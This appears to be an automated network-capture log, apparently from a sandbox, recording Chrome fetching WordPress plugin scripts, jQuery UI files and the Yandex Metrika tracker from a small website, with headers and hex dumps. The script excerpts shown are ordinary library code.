                                                                                                          2024-12-12 11:58:39 UTC1167INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 73 65 6c 65 63 74 73 28 29 20 7b 0a 20 20 20 20 0a 20 20 20 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 63 68 6f 73 65 6e 27 29 20 7b 0a 09 6a 51 75 65 72 79 28 22 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 2c 20 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 70 72 69 63 65 5f 66 69 6c 74 65 72 5f 64 72 6f 70 64 6f 77 6e 22 29 2e 63 68 6f 73 65 6e 28 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 73 65 6c 65 63 74 77 6f 6f 27 29 20 7b 0a 09 6a 51 75 65 72 79 28 22 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 2c 20 73 65 6c 65 63 74 2e 77 6f 6f 66
                                                                                                          Data Ascii: "use strict";function woof_init_selects() { if (woof_select_type == 'chosen') {jQuery("select.woof_select, select.woof_price_filter_dropdown").chosen(); } else if (woof_select_type == 'selectwoo') {jQuery("select.woof_select, select.woof


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          141192.168.2.2449936147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC565OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:39 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2047
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC2047INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 6d 73 65 6c 65 63 74 73 28 29 20 7b 0a 0a 20 20 20 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 63 68 6f 73 65 6e 27 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 6d 73 65 6c 65 63 74 27 29 2e 63 68 6f 73 65 6e 28 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 74 79 70 65 20 3d 3d 20 27 73 65 6c 65 63 74 77 6f 6f 27 29 20 7b 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 73 65 6c 65 63 74 2e 77 6f 6f 66 5f 6d 73 65 6c 65 63 74 27 29 2e 73 65 6c 65 63 74 57 6f 6f 28 29 3b 0a 20
                                                                                                          Data Ascii: "use strict";function woof_init_mselects() { if (woof_select_type == 'chosen') { jQuery('select.woof_mselect').chosen(); } else if (woof_select_type == 'selectwoo') { try { jQuery('select.woof_mselect').selectWoo();


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          142192.168.2.2449937147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC708OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:39 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 21464
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70
                                                                                                          Data Ascii: /*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-exp
                                                                                                          2024-12-12 11:58:39 UTC5080INData Raw: 6c 65 64 26 26 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 44 69 73 61 62 6c 65 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64 69 73 61 62 6c 65 64 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 22 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 78 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 78 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 78 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73
                                                                                                          Data Ascii: led&&this._setOptionDisabled(this.options.disabled),this._trigger("create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:x.noop,_create:x.noop,_init:x.noop,destroy:function(){var i=this;this._des


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          143192.168.2.2449938147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC621OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_featured.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
                                                                                                          2024-12-12 11:58:39 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1665
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC1665INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 66 65 61 74 75 72 65 64 28 29 20 7b 0a 0a 20 20 20 20 69 66 20 28 69 63 68 65 63 6b 5f 73 6b 69 6e 20 21 3d 20 27 6e 6f 6e 65 27 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 66 65 61 74 75 72 65 64 27 29 2e 69 43 68 65 63 6b 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 62 6f 78 43 6c 61 73 73 3a 20 27 69 63 68 65 63 6b 62 6f 78 5f 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 73 6b 69 6e 20 2b 20 27 2d 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 63 6f 6c 6f 72 2c 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63
                                                                                                          Data Ascii: "use strict";function woof_init_featured() { if (icheck_skin != 'none') { jQuery('.woof_checkbox_featured').iCheck({ checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color, }); jQuery('.woof_c


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          144192.168.2.2449939147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC709OUTGET /wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:39 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3428
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC3428INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4d 6f 75 73 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71
                                                                                                          Data Ascii: /*! * jQuery UI Mouse 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?define(["jq


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          145192.168.2.244994087.250.251.1194437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:39 UTC518OUTGET /metrika/tag.js HTTP/1.1
                                                                                                          Host: mc.yandex.ru
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; yandexuid=2276949521734004716; yashr=5720641361734004716
                                                                                                          2024-12-12 11:58:39 UTC851INHTTP/1.1 200 OK
                                                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                          Accept-Ranges: bytes
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: max-age=3600
                                                                                                          Connection: Close
                                                                                                          Content-Length: 226005
                                                                                                          Content-Type: application/javascript
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          ETag: "674f133a-372d5"
                                                                                                          Expires: Thu, 12 Dec 2024 12:58:39 GMT
                                                                                                          Last-Modified: Tue, 03 Dec 2024 14:18:34 GMT
                                                                                                          Set-Cookie: _yasc=OVo8NsGDj4fU5rZDUGHOel2ipnb/EQ2I3qkGfFJaSjaV9ln9OXbGwp+K6gen9zmyB7gX; domain=.yandex.ru; path=/; expires=Sun, 10 Dec 2034 11:58:39 GMT; secure
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Timing-Allow-Origin: *
                                                                                                          2024-12-12 11:58:39 UTC4828INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 62 61 29 7b 76 61 72 20 74 61 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 3c 62 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 62 61 5b 74 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 62 61 29 7b 76 61 72 20 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 61 29 72 65 74 75 72 6e 20 74 61 2e 63 61 6c 6c 28 62 61 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 61 2e 6c 65 6e 67 74 68
                                                                                                          Data Ascii: (function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function t(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length
                                                                                                          2024-12-12 11:58:39 UTC8168INData Raw: 66 29 3b 68 3d 7b 59 3a 65 2c 70 65 72 6d 69 73 73 69 6f 6e 73 3a 68 7d 3b 22 70 72 6f 22 3d 3d 3d 67 2e 74 79 70 65 3f 54 6d 28 61 2c 62 2c 63 2c 67 2c 68 29 3a 22 70 69 78 22 3d 3d 3d 67 2e 74 79 70 65 26 26 28 66 3d 68 2e 59 2c 68 3d 68 2e 70 65 72 6d 69 73 73 69 6f 6e 73 2c 67 3d 67 2e 64 61 74 61 2e 70 69 78 65 6c 55 72 6c 2c 4f 28 67 29 26 26 28 66 2e 63 68 65 63 6b 50 65 72 6d 69 73 73 69 6f 6e 28 7b 70 65 72 6d 69 73 73 69 6f 6e 73 3a 68 2c 70 65 72 6d 69 73 73 69 6f 6e 54 79 70 65 3a 22 70 69 78 65 6c 22 2c 70 65 72 6d 69 73 73 69 6f 6e 50 61 72 61 6d 73 3a 7b 75 72 6c 3a 67 7d 7d 29 2c 53 68 28 61 2c 67 2c 42 2c 42 29 29 29 7d 29 2c 76 64 28 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 64 29 29 7d 66 75 6e 63 74
                                                                                                          Data Ascii: f);h={Y:e,permissions:h};"pro"===g.type?Tm(a,b,c,g,h):"pix"===g.type&&(f=h.Y,h=h.permissions,g=g.data.pixelUrl,O(g)&&(f.checkPermission({permissions:h,permissionType:"pixel",permissionParams:{url:g}}),Sh(a,g,B,B)))}),vd(function(f,g){return f-g},d))}funct
                                                                                                          2024-12-12 11:58:39 UTC8168INData Raw: 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 28 6e 65 77 20 52 65 67 45 78 70 28 62 29 29 2e 74 65 73 74 28 61 29 7d 63 61 74 63 68 28 63 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 6a 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 44 65 28 61 2c 62 29 26 26 44 65 28 61 2c 63 29 3f 62 3c 63 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 68 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 44 65 28 61 2c 62 29 26 26 44 65 28 61 2c 63 29 3f 62 3e 63 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 67 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6d 6e 28 61 29 7b 6e 6e 28 61 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 67 64 28 61 2c 22 79 74 6d 2e 22 2b 62 2c 63 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 61 2c
                                                                                                          Data Ascii: rn!1;try{return(new RegExp(b)).test(a)}catch(c){return!1}}function jn(a,b,c){return De(a,b)&&De(a,c)?b<c:!1}function hn(a,b,c){return De(a,b)&&De(a,c)?b>c:!1}function gn(a,b){return a===b}function mn(a){nn(a,function(b,c){gd(a,"ytm."+b,c)})}function ze(a,
                                                                                                          2024-12-12 11:58:40 UTC4948INData Raw: 65 78 22 2c 64 2e 69 73 59 61 6e 64 65 78 3d 49 65 28 61 29 2c 64 7d 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 6c 6f 28 61 2c 62 2c 63 29 7b 61 3d 63 7c 7c 70 69 28 61 29 3b 72 65 74 75 72 6e 20 47 28 61 2c 62 29 3f 61 3a 22 65 6e 22 7d 66 75 6e 63 74 69 6f 6e 20 79 69 28 61 29 7b 69 66 28 47 28 61 2c 5b 22 47 44 50 52 2d 6f 6b 2d 76 69 65 77 2d 64 65 66 61 75 6c 74 22 2c 22 47 44 50 52 2d 6f 6b 2d 76 69 65 77 2d 64 65 74 61 69 6c 65 64 22 5d 29 29 72 65 74 75 72 6e 20 68 64 3b 61 3d 61 2e 72 65 70 6c 61 63 65 28 22 47 44 50 52 2d 6f 6b 2d 76 69 65 77 2d 64 65 74 61 69 6c 65 64 2d 22 2c 22 22 29 3b 72 65 74 75 72 6e 20 47 28 61 2c 4b 63 29 3f 61 3a 68 64 7d 66 75 6e 63 74 69 6f 6e 20 7a 69 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 6e 28
                                                                                                          Data Ascii: ex",d.isYandex=Ie(a),d});return c}function lo(a,b,c){a=c||pi(a);return G(a,b)?a:"en"}function yi(a){if(G(a,["GDPR-ok-view-default","GDPR-ok-view-detailed"]))return hd;a=a.replace("GDPR-ok-view-detailed-","");return G(a,Kc)?a:hd}function zi(a,b,c){var d=n(
                                                                                                          2024-12-12 11:58:40 UTC8168INData Raw: 28 61 2c 63 29 3a 22 22 7d 66 75 6e 63 74 69 6f 6e 20 66 67 28 61 2c 62 2c 63 29 7b 69 66 28 62 3d 49 61 28 61 2c 62 29 29 61 3d 50 65 28 5b 22 64 72 22 2c 63 7c 7c 22 22 2b 63 62 28 61 2c 31 30 2c 39 39 29 5d 29 2c 62 2e 70 61 72 61 6d 73 28 50 65 28 5b 22 5f 5f 79 6d 22 2c 61 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 67 28 61 2c 0a 62 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 3b 74 72 79 7b 63 3d 62 3f 50 63 28 62 2c 61 29 3a 63 7d 63 61 74 63 68 28 64 29 7b 7d 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 4d 69 28 61 29 7b 61 3d 53 61 28 54 66 28 61 29 29 3b 72 65 74 75 72 6e 20 45 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 62 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2e 74 6f 53 74 72 69 6e 67 28 32 29 3b 72 65 74 75 72 6e 20 4e 69 28 22 30 22 2c
                                                                                                          Data Ascii: (a,c):""}function fg(a,b,c){if(b=Ia(a,b))a=Pe(["dr",c||""+cb(a,10,99)]),b.params(Pe(["__ym",a]))}function eg(a,b){var c=null;try{c=b?Pc(b,a):c}catch(d){}return c}function Mi(a){a=Sa(Tf(a));return E(function(b){b=b.charCodeAt(0).toString(2);return Ni("0",
                                                                                                          2024-12-12 11:58:40 UTC8168INData Raw: 2a 28 31 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 7d 66 75 6e 63 74 69 6f 6e 20 49 64 28 61 2c 0a 62 2c 63 29 7b 61 3d 55 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 62 2c 63 29 7c 7c 74 68 69 73 3b 61 2e 76 69 73 69 62 69 6c 69 74 79 3d 6e 75 6c 6c 3b 52 28 61 2e 6c 2e 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 29 3f 52 28 61 2e 6c 2e 64 6f 63 75 6d 65 6e 74 2e 6d 73 48 69 64 64 65 6e 29 3f 52 28 61 2e 6c 2e 64 6f 63 75 6d 65 6e 74 2e 77 65 62 6b 69 74 48 69 64 64 65 6e 29 7c 7c 28 61 2e 76 69 73 69 62 69 6c 69 74 79 3d 7b 68 69 64 64 65 6e 3a 22 77 65 62 6b 69 74 48 69 64 64 65 6e 22 2c 65 76 65 6e 74 3a 22 77 65 62 6b 69 74 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65
                                                                                                          Data Ascii: *(1+Math.random())).toString(16).substring(1)}function Id(a,b,c){a=U.call(this,a,b,c)||this;a.visibility=null;R(a.l.document.hidden)?R(a.l.document.msHidden)?R(a.l.document.webkitHidden)||(a.visibility={hidden:"webkitHidden",event:"webkitvisibilitychange
                                                                                                          2024-12-12 11:58:40 UTC8168INData Raw: 62 28 61 29 7c 7c 22 22 29 7c 7c 28 64 3d 22 62 22 29 3b 0a 76 61 72 20 65 3d 6e 28 62 2c 22 73 65 74 74 69 6e 67 73 2e 77 65 62 76 69 73 6f 72 2e 72 65 63 70 22 29 3b 69 66 28 21 61 2e 69 73 46 69 6e 69 74 65 28 65 29 7c 7c 30 3e 65 7c 7c 31 3c 65 29 64 3d 22 77 22 3b 64 7c 7c 28 64 3d 4c 28 61 29 2e 43 28 22 68 69 74 49 64 22 29 25 31 45 34 2f 31 45 34 3c 65 3f 22 77 22 3a 22 62 22 29 3b 63 2e 44 28 22 76 69 73 6f 72 63 22 2c 64 2c 33 30 29 3b 72 65 74 75 72 6e 22 77 22 3d 3d 3d 64 7d 66 75 6e 63 74 69 6f 6e 20 54 65 28 61 2c 62 2c 63 29 7b 61 3d 67 63 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 62 2c 63 29 7c 7c 74 68 69 73 3b 61 2e 62 75 66 66 65 72 3d 5b 5d 3b 61 2e 41 67 3d 37 35 30 30 3b 61 2e 24 63 3d 33 45 34 3b 61 2e 55 63 28 29 3b 72 65 74 75 72 6e
                                                                                                          Data Ascii: b(a)||"")||(d="b");var e=n(b,"settings.webvisor.recp");if(!a.isFinite(e)||0>e||1<e)d="w";d||(d=L(a).C("hitId")%1E4/1E4<e?"w":"b");c.D("visorc",d,30);return"w"===d}function Te(a,b,c){a=gc.call(this,a,b,c)||this;a.buffer=[];a.Ag=7500;a.$c=3E4;a.Uc();return
